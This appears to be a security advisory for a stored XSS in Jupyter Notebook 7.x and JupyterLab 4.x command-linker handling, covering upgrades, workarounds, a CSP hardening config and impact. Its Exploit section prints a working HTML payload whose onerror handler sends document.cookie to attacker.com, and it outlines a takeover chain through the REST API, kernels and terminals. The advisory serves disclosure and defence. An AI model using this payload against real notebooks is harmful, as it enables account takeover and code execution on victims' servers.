Jupyter Notebook, Stored XSS, CVE-2026-40171 (High)

The vulnerability resides in the help extension of Jupyter Notebook 7.x and JupyterLab 4.x, specifically in its command linker functionality. When a user opens a maliciously crafted notebook, attacker-controlled HTML reaches the command linker, and the way the linker handles element attributes lets the injected XSS payload through.
1. Root cause: The command linker module, which builds the interactive help dialogs, does not sufficiently sanitize attributes that come from notebook content.
2. Attack vector: The attacker crafts a notebook whose HTML carries a help command with a malicious command linker attribute.
3. Trigger: The payload is stored in the notebook and waits for user interaction (for example, a click on a link or button that looks legitimate).
4. XSS activation: On that interaction, the injected JavaScript executes in the context of the Jupyter web interface.
5. Token theft: The script steals the victim's credentials (a readable cookie or bearer token) and sends them to an attacker-controlled server.
6. Account takeover: With the stolen token, the attacker impersonates the victim against the Jupyter REST API.
7. Full control: The API lets the attacker read, modify, or delete any file the victim's server can reach.
8. Kernel access: The attacker can connect to running kernels and execute arbitrary Python or shell commands.
9. Privilege escalation: Through the API, the attacker can spawn new terminals and obtain a direct shell on the underlying host.
10. Persistence: The attacker can alter the victim's Jupyter configuration to keep access even after the token is rotated.
The vulnerability is cataloged as CVE-2026-40171 and was reported by Daniel Teixeira of the NVIDIA AI Red Team.

DailyCVE Form

| Field | Value |
|-|-|
| Platform | Jupyter Notebook |
| Version | 7.0.0–7.5.5 |
| Vulnerability | Stored XSS / Token theft |
| Severity | High |
| Date | 2026-04-30 |
| Prediction | Already patched (2026-04-30) |

What Undercode Say:

Check affected versions:
jupyter notebook --version
jupyter lab --version

Disable the vulnerable help extension (temporary workaround until you can upgrade):
jupyter labextension disable @jupyter-notebook/help-extension
jupyter labextension disable @jupyterlab/help-extension

Apply the patch (upgrade to the fixed versions):
pip install --upgrade notebook==7.5.6
pip install --upgrade jupyterlab==4.5.7

Disable the command linker in the sanitizer settings. The snippet below writes the current user's settings file only; to apply it for every user on the server, put the same JSON in <sys.prefix>/share/jupyter/lab/settings/overrides.json instead:
cat > ~/.jupyter/lab/user-settings/@jupyterlab/apputils-extension/sanitizer.jupyterlab-settings <<EOF
{
  "@jupyterlab/apputils-extension:sanitizer": {
    "allowCommandLinker": false
  }
}
EOF

Exploit:

A malicious notebook contains a markdown (or raw) cell with HTML such as:

<a href="javascript:void(0)"
data-command-linker='{"id":"help:open","args":{"text":"<img src=x onerror=fetch(`https://attacker.com/steal?token=${document.cookie}`)>"}}'>
Click here for documentation
</a>

When the victim clicks the seemingly innocent link, the `onerror` handler fires and posts `document.cookie` to the attacker's host. One caveat when reproducing this: Jupyter Server sets its login cookie with the HttpOnly flag, so `document.cookie` normally yields only the readable `_xsrf` cookie. The script nonetheless runs in the Jupyter origin, so it can call the REST API directly with the victim's session (sending the `_xsrf` value in the `X-XSRFToken` header), which is enough for the account-takeover chain above without exfiltrating any cookie.

Protection from this CVE

  1. Upgrade immediately to Notebook 7.5.6 or JupyterLab 4.5.7.
  2. Until you can upgrade, disable the help extension with the `jupyter labextension disable` commands above.
  3. Disable the command linker for every user by placing the sanitizer settings shown above in `overrides.json` (a per-user settings file protects only the user who has it).
  4. Enforce Content Security Policy (CSP) headers to restrict where the notebook UI may load scripts from and connect to.
  5. Monitor for exfiltration: with a `report-uri` directive in the CSP, Jupyter Server logs each violation (such as a blocked `fetch` to an external domain) as a warning in its own log.
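A server-side hardening file covering items 4 and 5 above and the terminal step of the attack chain, as an added example that is not from the advisory or the Jupyter project. `ServerApp.terminals_enabled` and the `ServerApp.tornado_settings["headers"]` override of `Content-Security-Policy` are real Jupyter Server settings; the policy itself, the `BASE_URL` value and the `csp_header`/`tornado_settings` helper names are assumptions, and the policy must be validated in staging because a stricter CSP can break JupyterLab features.

```python
"""jupyter_server_config.py hardening against the post-exploitation chain above.

Added example (not from the advisory or the Jupyter project). The policy keeps
Jupyter Server's default frame-ancestors 'self', adds connect-src 'self' so that
injected script cannot fetch() an attacker host, and sends violation reports to
/api/security/csp-report, which Jupyter Server logs as warnings.
"""

BASE_URL = "/"  # assumption: set to your ServerApp.base_url, e.g. "/user/alice/" behind JupyterHub

CSP_DIRECTIVES = {
    # Jupyter Server's default directive; keep it so the UI cannot be framed elsewhere.
    "frame-ancestors": "'self'",
    # fetch/XHR/WebSocket may only target the notebook server's own origin
    # ('self' also matches same-origin ws:/wss: in current browsers, which kernels need).
    "connect-src": "'self'",
    # Jupyter Server's CSPReportHandler logs whatever browsers POST here as a warning.
    "report-uri": "/api/security/csp-report",
}


def csp_header(base_url=BASE_URL):
    """Render CSP_DIRECTIVES as one header value; report-uri is prefixed with base_url."""
    parts = []
    for name, value in CSP_DIRECTIVES.items():
        if name == "report-uri":
            value = base_url.rstrip("/") + value
        parts.append(f"{name} {value}")
    return "; ".join(parts)


def tornado_settings(base_url=BASE_URL):
    """Value for ServerApp.tornado_settings; Jupyter Server sends headers[...] verbatim."""
    return {"headers": {"Content-Security-Policy": csp_header(base_url)}}


try:
    c = get_config()  # injected by the Jupyter config loader when loaded as a config file
except NameError:
    pass  # imported as a plain module (for example by a test): nothing to configure
else:
    # No terminal endpoint at all: a hijacked session cannot spawn a shell (step 9 above).
    c.ServerApp.terminals_enabled = False
    c.ServerApp.tornado_settings = tornado_settings()
```

With this file in place, an injected `fetch("https://attacker.com/...")` is blocked by the browser and shows up as a "Content security violation" warning in the server log, which is the signal item 5 asks you to watch for; the trade-off is that any extension that legitimately talks to a third-party origin from the browser needs that origin added to `connect-src`.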

Impact

  • Account takeover – full control over the victim’s Jupyter environment.
  • Data breach – reading, modifying, or deleting all files accessible by the victim.
  • Code execution – arbitrary code execution on the server via kernel manipulation.
  • System compromise – creation of terminals for persistent shell access.
  • Lateral movement – use the compromised server to pivot into internal networks.

Sources:

Reported By: github.com